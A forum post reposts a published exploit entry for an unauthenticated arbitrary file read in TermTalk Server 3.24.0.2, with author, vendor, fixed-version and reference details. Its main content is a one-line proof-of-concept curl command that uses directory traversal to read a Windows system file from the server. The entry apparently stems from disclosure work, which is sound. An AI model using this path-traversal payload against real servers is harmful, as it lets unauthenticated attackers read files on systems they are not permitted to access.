This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,700 With Us For: 236 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) # Date: 03/01/2022 # Exploit Author: Fabiano Golluscio @ Swascan # Vendor Homepage: https://www.solari.it/it/ # Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/ # Version: 3.24.0.2 # Fixed Version: 3.26.1.7 # Reference: https://www.swascan.com/solari-di-udine/ POC curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts Link to comment Share on other sites More sharing options...
Recommended Posts